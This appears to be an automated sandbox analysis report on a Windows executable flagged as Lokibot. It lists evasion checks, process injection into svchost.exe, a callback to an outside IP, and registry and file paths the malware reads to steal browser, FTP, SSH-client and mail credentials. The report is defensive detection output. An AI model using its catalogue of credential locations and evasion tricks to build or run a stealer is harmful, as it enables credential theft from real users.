Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00BD48D7
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C55376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00C55376

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00BF3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00BF3187

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

API/Special instruction interceptor: Address: 11A7CDC

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PRI_VTK250419A.exe, 00000000.00000003.2048846672.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, PRI_VTK250419A.exe, 00000000.00000003.2059719267.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, PRI_VTK250419A.exe, 00000000.00000003.2048318647.0000000001195000.00000004.00000020.00020000.00000000.sdmp, PRI_VTK250419A.exe, 00000000.00000003.2049315459.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, PRI_VTK250419A.exe, 00000000.00000003.2049626464.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, PRI_VTK250419A.exe, 00000000.00000003.2049085094.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, PRI_VTK250419A.exe, 00000000.00000003.2048261765.0000000001185000.00000004.00000020.00020000.00000000.sdmp, PRI_VTK250419A.exe, 00000000.00000003.2049500244.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, PRI_VTK250419A.exe, 00000000.00000003.2050369214.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, PRI_VTK250419A.exe, 00000000.00000002.2060676754.00000000011AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXEEH
Source: PRI_VTK250419A.exe	Binary or memory string: FIDDLER.EXE

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

API coverage: 4.6 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 4120

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C3445A
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3C6D1 FindFirstFileW,FindClose,	0_2_00C3C6D1
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C3C75C
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C3EF95
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C3F0F2
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C3F3F3
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C337EF
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C33B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C33B12
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C3BCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	2_2_00403D74

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00BD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00BD49A0

Source: C:\Windows\SysWOW64\svchost.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: svchost.exe, 00000002.00000002.3294383886.0000000003000000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C43F09 BlockInput,

0_2_00C43F09

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00BD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00BD3B3A

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C05A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00C05A7C

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00BD4B37 LoadLibraryA,GetProcAddress,

0_2_00BD4B37

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_0112257B mov eax, dword ptr fs:[00000030h]	0_2_0112257B
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_011A6938 mov eax, dword ptr fs:[00000030h]	0_2_011A6938
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_011A7F48 mov eax, dword ptr fs:[00000030h]	0_2_011A7F48
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_011A7FA8 mov eax, dword ptr fs:[00000030h]	0_2_011A7FA8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00194610 mov eax, dword ptr fs:[00000030h]	2_2_00194610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00194610 mov eax, dword ptr fs:[00000030h]	2_2_00194610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00194610 mov eax, dword ptr fs:[00000030h]	2_2_00194610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00194610 mov eax, dword ptr fs:[00000030h]	2_2_00194610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00194410 mov eax, dword ptr fs:[00000030h]	2_2_00194410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00194410 mov eax, dword ptr fs:[00000030h]	2_2_00194410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_001956A0 mov eax, dword ptr fs:[00000030h]	2_2_001956A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_001956A0 mov ecx, dword ptr fs:[00000030h]	2_2_001956A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00193540 mov eax, dword ptr fs:[00000030h]	2_2_00193540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00193540 mov eax, dword ptr fs:[00000030h]	2_2_00193540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00193540 mov eax, dword ptr fs:[00000030h]	2_2_00193540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00193060 mov eax, dword ptr fs:[00000030h]	2_2_00193060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00193060 mov eax, dword ptr fs:[00000030h]	2_2_00193060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00193060 mov eax, dword ptr fs:[00000030h]	2_2_00193060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00193060 mov eax, dword ptr fs:[00000030h]	2_2_00193060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]	2_2_0040317B

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C280A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00C280A9

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BFA124 SetUnhandledExceptionFilter,	0_2_00BFA124
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00BFA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BFA155
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00195848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00195848
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_001933C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	2_2_001933C0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.80.1 80

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2BD7008

Jump to behavior

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C287B1 LogonUserW,

0_2_00C287B1

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00BD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00BD3B3A

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00BD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00BD48D7

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C34C53 mouse_event,

0_2_00C34C53

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PRI_VTK250419A.exe"

Jump to behavior

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C27CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00C27CAF

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C2874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00C2874B

Source: PRI_VTK250419A.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PRI_VTK250419A.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00BF862B cpuid

0_2_00BF862B

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C04E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00C04E87

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C11E06 GetUserNameW,

0_2_00C11E06

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C03F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00C03F3A

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00BD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00BD49A0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PRI_VTK250419A.exe PID: 7140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3868, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.3294418603.0000000003021000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: PopPassword		2_2_0040D069
